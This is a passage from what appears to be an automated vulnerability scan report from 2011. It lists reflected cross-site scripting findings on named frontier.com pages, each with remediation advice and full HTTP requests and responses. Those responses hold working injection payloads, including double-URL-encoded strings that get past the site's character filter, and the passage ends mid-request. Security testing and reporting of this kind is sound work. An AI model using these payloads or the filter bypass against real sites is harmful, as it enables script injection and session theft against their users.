The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Controls/VirtualCode.ashxcb66e%2527%253balert%25281%2529%252f%252f3775dfb9153?pageid=73&origPath=%2ftopNav.css%2f HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43979


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Controls/VirtualCode.ashxcb66e';alert(1)//3775dfb9153?pageid=73&origPath=/topNav.css/');//]]>
...[SNIP]...

2.84. http://www.frontier.com/Images/Common/form_bg.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /Images/Common/form_bg.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3d86%2527%253balert%25281%2529%252f%252f44493412d91 was submitted in the REST URL parameter 1. This input was echoed as c3d86';alert(1)//44493412d91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Imagesc3d86%2527%253balert%25281%2529%252f%252f44493412d91/Common/form_bg.gif HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43691


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Imagesc3d86';alert(1)//44493412d91/Common/form_bg.gif');//]]>
...[SNIP]...

2.85. http://www.frontier.com/Images/Common/form_bg.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /Images/Common/form_bg.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80d1c%2527%253balert%25281%2529%252f%252f47a4aeee6e7 was submitted in the REST URL parameter 2. This input was echoed as 80d1c';alert(1)//47a4aeee6e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Images/Common80d1c%2527%253balert%25281%2529%252f%252f47a4aeee6e7/form_bg.gif HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43691


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Images/Common80d1c';alert(1)//47a4aeee6e7/form_bg.gif');//]]>
...[SNIP]...

2.86. http://www.frontier.com/Images/Common/form_bg.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /Images/Common/form_bg.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 970f4%2527%253balert%25281%2529%252f%252ff20c2fa2242 was submitted in the REST URL parameter 3. This input was echoed as 970f4';alert(1)//f20c2fa2242 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Images/Common/form_bg.gif970f4%2527%253balert%25281%2529%252f%252ff20c2fa2242 HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43691


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Images/Common/form_bg.gif970f4';alert(1)//f20c2fa2242');//]]>
...[SNIP]...

2.87. http://www.frontier.com/Images/Common/form_bg.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /Images/Common/form_bg.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b56f6'%3balert(1)//227d16cdf97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b56f6';alert(1)//227d16cdf97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Images/Common/form_bg.gif?b56f6'%3balert(1)//227d16cdf97=1 HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43741


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/Images/Common/form_bg.gif?b56f6';alert(1)//227d16cdf97=1');//]]>
...[SNIP]...

2.88. http://www.frontier.com/yahoo/fpsearchlg.asp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /yahoo/fpsearchlg.asp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17124%2527%253balert%25281%2529%252f%252fdf531ca5181 was submitted in the REST URL parameter 1. This input was echoed as 17124';alert(1)//df531ca5181 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /yahoo17124%2527%253balert%25281%2529%252f%252fdf531ca5181/fpsearchlg.asp?type=biz HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43727


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/yahoo17124';alert(1)//df531ca5181/fpsearchlg.asp?type=biz');//]]>
...[SNIP]...

2.89. http://www.frontier.com/yahoo/fpsearchlg.asp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /yahoo/fpsearchlg.asp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b was submitted in the REST URL parameter 2. This input was echoed as a4f61';alert(1)//5fb1c88860b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43727


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/yahoo/fpsearchlg.aspa4f61';alert(1)//5fb1c88860b?type=biz');//]]>
...[SNIP]...

2.90. http://www.frontier.com/yahoo/fy_excl2.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.frontier.com
Path:   /yahoo/fy_excl2.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69d70'%3b8506878fe2 was submitted in the REST URL parameter 1. This input was echoed as 69d70';8506878fe2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /yahoo69d70'%3b8506878fe2/fy_excl2.aspx HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43315


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/yahoo69d70';8506878fe2/fy_excl2.aspx');//]]>
...[SNIP]...

2.91. http://www.frontier.com/yahoo/fy_excl2.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /yahoo/fy_excl2.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 747f9%2527%253balert%25281%2529%252f%252fcb0ef15e2ce was submitted in the REST URL parameter 2. This input was echoed as 747f9';alert(1)//cb0ef15e2ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /yahoo/fy_excl2.aspx747f9%2527%253balert%25281%2529%252f%252fcb0ef15e2ce HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43633


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/yahoo/fy_excl2.aspx747f9';alert(1)//cb0ef15e2ce');//]]>
...[SNIP]...

2.92. https://www.frontier.com/AgentOrdering/Login/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /AgentOrdering/Login/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dcc6'%3balert(1)//b78c0a9a96c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7dcc6';alert(1)//b78c0a9a96c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AgentOrdering/Login/?7dcc6'%3balert(1)//b78c0a9a96c=1 HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48631


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/AgentOrdering/Login/Default.aspx?7dcc6';alert(1)//b78c0a9a96c=1');
var Page_ValidationActive = false;
if (typeof(ValidatorOnLoad) == "function") {
ValidatorOnLoad();
}

function ValidatorOnSubmit() {
if (Page_ValidationActive) {
return Va
...[SNIP]...

2.93. https://www.frontier.com/AgentOrdering/Login/Default.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /AgentOrdering/Login/Default.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf4af'-alert(1)-'9ff1a208c26e1167f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AgentOrderingcf4af'-alert(1)-'9ff1a208c26e1167f/Login/Default.aspx?__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTQyNjYzNDI3OA9kFgJmD2QWAmYPZBYEAgkPFgIeBFRleHQFow48ZGl2IGlkPSJoZWFkZXIiPgogIDxkaXYgY2xhc3M9ImhlYWRlck5hdiI%2BCiAgICA8ZGl2IGlkPSJsZWZ0SGVhZGVyIj4KICAgICAgPGRpdiBjbGFzcz0ibG9nbyI%2BCiAgICAgICAgPGEgaWQ9ImhvbWVMaW5rIiB0aXRsZT0iRnJvbnRpZXIgQ29tbXVuaWNhdGlvbnMiIGhyZWY9Ii8iPgogICAgICAgICAgPGltZyBhbHQ9IkZyb250aWVyTG9nbyIgc3JjPSIvaW1hZ2VzL0ZUUk1haW4vZnJvbnRpZXJfTG9nby5qcGciIGJvcmRlcj0iMCIgaGVpZ2h0PSI1MSIgd2lkdGg9IjE1NiI%2BCiAgICAgICAgPC9hPgogICAgICA8L2Rpdj4KICAgICAgPHVsIGlkPSJkcm9wZG93bl9uYXYiPgogICAgICAgIDxsaT48YSBjbGFzcz0iQ2hlY2tGb3JSZWdpb25PTkxZTEVHQUNZIiBocmVmPSIvQmlsbFBheS9Mb2dpbi5hc3B4Ij5PbmxpbmUgQmlsbCBQYXk8L2E%2BPC9saT4KICAgICAgICA8bGk%2BPGEgaHJlZj0iaHR0cDovL2Zyb250aWVyLm15LnlhaG9vLmNvbS8iPkZyb250aWVyIE15IFlhaG9vITwvYT48L2xpPgogICAgICAgIDxsaT48YSBocmVmPSJodHRwczovL2xvZ2luLmZyb250aWVyLmNvbS93ZWJtYWlsLyI%2BRnJvbnRpZXIgTWFpbDwvYT48L2xpPgogICAgICAgIDxsaT48YSBjbGFzcz0iQ2hlY2tGb3JSZWdpb25PTkxZTEVHQUNZIiBocmVmPSIvU2hvcC9Mb2dpbi5hc3B4Ij5NeSBBY2NvdW50PC9hPjwvbGk%2BCiAgICAgICAgPGxpIGlkPSJzZWxlY3RlZCIgY2xhc3M9ImFnZW50bG9naW4iPkFnZW50IExvZ2luIAogICAgICAgICAgPGRpdiBjbGFzcz0iYXJyb3ciPjxpbWcgc3JjPSIvaW1hZ2VzL0ZUUk1haW4vc21hbGxfYXJyb3cucG5nIiBib3JkZXI9IjAiIGhlaWdodD0iNCIgd2lkdGg9IjciPjwvZGl2PgogICAgICAgICAgPHVsPgogICAgICAgICAgICA8bGk%2BPGEgaHJlZj0iL0FnZW50T3JkZXJpbmcvTG9naW4vIj5SZXNpZGVudGlhbCBBZ2VudDwvYT48L2xpPgogICAgICAgICAgICA8bGk%2BPGEgaHJlZj0iL0J1c2luZXNzQWdlbnRPcmRlci9Mb2dpbi8iPkJ1c2luZXNzIEFnZW50PC9hPjwvbGk%2BCiAgICAgICAgICA8L3VsPgogICAgICAgIDwvbGk%2BCiAgICAgIDwvdWw%2BCiAgICAgIDxkaXYgY2xhc3M9ImxvY2F0aW9uIj5DdXJyZW50IExvY2F0aW9uOgogICAgICAgIDxhIGlkPSJMb2NhbGUiIGNsYXNzPSJjaGFuZ2VMb2NhbGUiIGhyZWY9IiMiPlNlbGVjdCBMb2NhdGlvbjwvYT4KICAgICAgPC9kaXY%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%2BU2VhcmNoIEZyb250aWVyPC9zcGFuPgogICAgICAgICAgPGlucHV0IHZhbHVlPSJQb3J0YWwiIG5hbWU9InJkb1NlYXJjaCIgdHlwZT0icmFkaW8iPgogICAgICAgICAgPHNwYW4gaWQ9IlNXT
GluayI%2BU2VhcmNoIHRoZSBXZWI8L3NwYW4%2BCiAgICAgICAgPC9kaXY%2BCiAgICAgIDwvZm9ybT4KICAgIDwvZGl2PgogIDwvZGl2Pgo8L2Rpdj5kAgsPZBYMAgEPZBYCAgEPZBYCZg9kFgJmD2QWAgIBD2QWBgIHDw8WBB8ABQ1FbnRlciBQaG9uZSAjHgtOYXZpZ2F0ZVVybAVKL1JlZ2lvbi9EZWZhdWx0LmFzcHg%2FdHlwZT0xJnVybD0lMmZBZ2VudE9yZGVyaW5nJTJmTG9naW4lMmZEZWZhdWx0LmFzcHglM2ZkZAIJDw8WAh8BBUovUmVnaW9uL0RlZmF1bHQuYXNweD90eXBlPTEmdXJsPSUyZkFnZW50T3JkZXJpbmclMmZMb2dpbiUyZkRlZmF1bHQuYXNweCUzZmRkAgsPDxYCHgdWaXNpYmxlaGRkAgMPZBYCAgEPZBYCZg8WAh8ABbwBPGRpdiBpZD0iVG9wTmF2X0NvbnRhaW5lciI%2BDQoJCTwvZGl2Pg0KPGlucHV0IG5hbWU9ImhmUGFnZVR5cGUiIHR5cGU9ImhpZGRlbiIgaWQ9ImhmUGFnZVR5cGUiIHZhbHVlPSIxIi8%2BDQo8aW5wdXQgbmFtZT0iaGZSZWNvcmRfVHlwZSIgdHlwZT0iaGlkZGVuIiBpZD0iaGZSZWNvcmRfVHlwZSIgdmFsdWU9IkNhdGVnb3J5Ii8%2BDQpkAgkPZBYGAgEPDxYCHwJnZBYCAgEPFgQfAAVjPGEgaHJlZj0iL0RlZmF1bHQuYXNweCI%2BSG9tZTwvYT4gJnJhcXVvOyA8YSBocmVnPSIvQWdlbnRPcmRlcmluZy8iPkFnZW50IE9yZGVyaW5nPC9hPiAmcmFxdW87IExvZ2luHwJnZAIDDxYCHwJoZAIFD2QWBAIBDxYCH